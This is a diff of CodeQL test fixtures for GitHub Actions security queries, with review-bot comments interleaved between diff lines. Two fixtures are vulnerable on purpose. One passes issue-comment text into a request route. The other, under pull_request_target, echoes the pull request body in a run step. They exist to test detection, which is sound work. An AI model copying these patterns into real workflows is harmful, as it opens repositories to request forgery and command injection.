+| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout |
+| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout |
+| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout |
+| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test12.yml:86:7:92:4 | Uses Step | actions/checkout |
+| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout |
+| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout |
+| .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout |
+| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout |
+| .github/workflows/test22.yml:57:15:62:12 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test22.yml:57:15:62:12 | Uses Step | actions/checkout |
+| .github/workflows/test27.yml:18:9:21:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test27.yml:18:9:21:6 | Uses Step | actions/checkout |
+| .github/workflows/test28.yml:17:9:20:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test28.yml:17:9:20:6 | Uses Step | actions/checkout |
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref
new file mode 100644
index 000000000000..6ce4123fa5ed
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref
@@ -0,0 +1 @@
+Security/CWE-829/UnversionedImmutableAction.ql
\ No newline at end of file
diff --git a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
new file mode 100644
index 000000000000..6937467453b2
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
@@ -0,0 +1,10 @@
+on: issue_comment
+
+jobs:
+ test1:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: octokit/request-action@v2
+ with:
+ route: ${{ github.event.comment.body }}
+
diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected
new file mode 100644
index 000000000000..d980139bb357
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected
@@ -0,0 +1,6 @@
+edges
+nodes
+| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body |
+subpaths
+#select
+| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} |
diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
new file mode 100644
index 000000000000..fcb4e41daf88
--- /dev/null
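Review bot: `UnversionedImmutableAction.qlref` is added without a trailing newline (`\ No newline at end of file`), while the sibling `UntrustedCheckoutMedium.qlref`, `RequestForgery.qlref` and `SyntaxError.qlref` in this patch end with one; the same applies to `UnnecessaryUseOfAdvancedConfig.qlref` at the end of the diff. Ending both files with a newline keeps the test tree consistent and avoids a spurious no-newline hunk the next time either file is touched.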
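Review bot: The CWE-918 fixture only exercises the positive case — one `route:` input fed straight from `github.event.comment.body` on an `issue_comment` trigger — so RequestForgery.expected cannot show that the query stays quiet on a safe input. A second job in the same file with a route built from a non-user-controlled context, e.g. `route: GET /repos/${{ github.repository }}`, would pin the absence of a false positive; append it below the existing job so the `9:19:9:50` location in the .expected file does not shift. Indentation is collapsed in this rendering, so I cannot confirm the nesting of `with:` under the step from the hunk alone.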
+++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
@@ -0,0 +1 @@
+Security/CWE-918/RequestForgery.ql
diff --git a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
new file mode 100644
index 000000000000..a8bfa4ae19a2
--- /dev/null
+++ b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
@@ -0,0 +1,7 @@
+on: pull_request_target
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo ${{ github.event.pull_request.body}}
diff --git a/actions/ql/test/query-tests/SyntaxError/SyntaxError.expected b/actions/ql/test/query-tests/SyntaxError/SyntaxError.expected
new file mode 100644
index 000000000000..386e6554e2dc
--- /dev/null
+++ b/actions/ql/test/query-tests/SyntaxError/SyntaxError.expected
@@ -0,0 +1 @@
+| .github/workflows/malformed.yml:7:4:7:4 | expected , but found '' | expected , but found '' |
diff --git a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref
new file mode 100644
index 000000000000..97c5686103cf
--- /dev/null
+++ b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref
@@ -0,0 +1 @@
+Debug/SyntaxError.ql
diff --git a/actions/ql/test/query-tests/SyntaxError/options b/actions/ql/test/query-tests/SyntaxError/options
new file mode 100644
index 000000000000..096355709a6f
--- /dev/null
+++ b/actions/ql/test/query-tests/SyntaxError/options
@@ -0,0 +1 @@
+semmle-extractor-options: --tolerate-parse-errors --experimental
diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml
new file mode 100644
index 000000000000..31f43d8b8b29
--- /dev/null
+++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml
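Review bot: The `malformed.yml` fixture says nothing about which construct is malformed, and the paired SyntaxError.expected in the next hunk only reports `expected , but found ''` at 7:4 — a message that names no token — so a reader cannot tell what parse error the test is meant to exercise; indentation is collapsed in this rendering, so I cannot recover it from the hunk either. A trailing comment such as `# deliberately malformed: <describe the construct on line 7>` placed after the last line would make the case self-describing without shifting the `7:4` location that SyntaxError.expected pins. If the empty quotes in that message are the extractor's real output, that is worth a look on the extractor side, but it is outside this patch.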
@@ -0,0 +1,70 @@
+# For most projects, this workflow file will not need changing; you simply need
+# to commit it to your repository.
+#
+# You may wish to alter this file to override the set of languages analyzed,
+# or to provide custom queries or build logic.
+#
+# ******** NOTE ********
+# We have attempted to detect the languages in your repository. Please check
+# the `language` matrix defined below to confirm you have the correct set of
+# supported CodeQL languages.
+#
+name: 'CodeQL'
+
+on:
+ push:
+ branches: [main]
+ pull_request:
+ # The branches below must be a subset of the branches above
+ branches: [main]
+ schedule:
+ - cron: '16 2 * * 5'
+
+jobs:
+ analyze:
+ name: Analyze
+ runs-on: ubuntu-latest
+ permissions:
+ actions: read
+ contents: read
+ security-events: write
+
+ strategy:
+ fail-fast: false
+ matrix:
+ language: ['javascript']
+ # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ]
+ # Learn more about CodeQL language support at https://git.io/codeql-language-support
+
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v4
+
+ # Initializes the CodeQL tools for scanning.
+ - name: Initialize CodeQL
+ uses: github/codeql-action/init@v3
+ with:
+ languages: ${{ matrix.language }}
+ # If you wish to specify custom queries, you can do so here or in a config file.
+ # By default, queries listed here will override any specified in a config file.
+ # Prefix the list here with "+" to use these queries and those in the config file.
+ # queries: ./path/to/local/query, your-org/your-repo/queries@main
+
+ # Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
+ # If this step fails, then you should remove it and run the build manually (see below)
+ - name: Autobuild
+ uses: github/codeql-action/autobuild@v3
+
+ # ℹī¸ Command-line programs to run using the OS shell.
+ # 📚 https://git.io/JvXDl
+
+ # ✏ī¸ If the Autobuild fails above, remove it and uncomment the following three lines
+ # and modify them (or add more) to build your code if your project
+ # uses a compiled language
+
+ #- run: |
+ # make bootstrap
+ # make release
+
+ - name: Perform CodeQL Analysis
+ uses: github/codeql-action/analyze@v3
diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml
new file mode 100644
index 000000000000..e736d567773b
--- /dev/null
+++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml
@@ -0,0 +1,41 @@
+name: 'CodeQL'
+
+on:
+ push:
+ branches: ['master']
+ pull_request:
+ branches: ['master']
+
+permissions:
+ actions: read
+ contents: read
+ packages: read
+ security-events: write
+
+jobs:
+ analyze:
+ name: Analyze
+ runs-on: ${{ matrix.os }}
+ strategy:
+ fail-fast: false
+ matrix:
+ include:
+ - language: javascript
+ os: ubuntu-22.04
+ - language: ruby
+ os: ubuntu-22.04-16core
+
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v4
+
+ - name: Initialize CodeQL
+ uses: github/codeql-action/init@v3
+ with:
+ languages: ${{ matrix.language }}
+ config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml
+
+ - name: Perform CodeQL Analysis
+ uses: github/codeql-action/analyze@v3
+ with:
+ category: codeql/${{ matrix.language }}/full
diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected
new file mode 100644
index 000000000000..3c8904a86af1
--- /dev/null
+++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected
@@ -0,0 +1 @@
+| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. |
diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref
new file mode 100644
index 000000000000..75a8fe2398a6
--- /dev/null
+++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref
@@ -0,0 +1 @@
+Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
\ No newline at end of file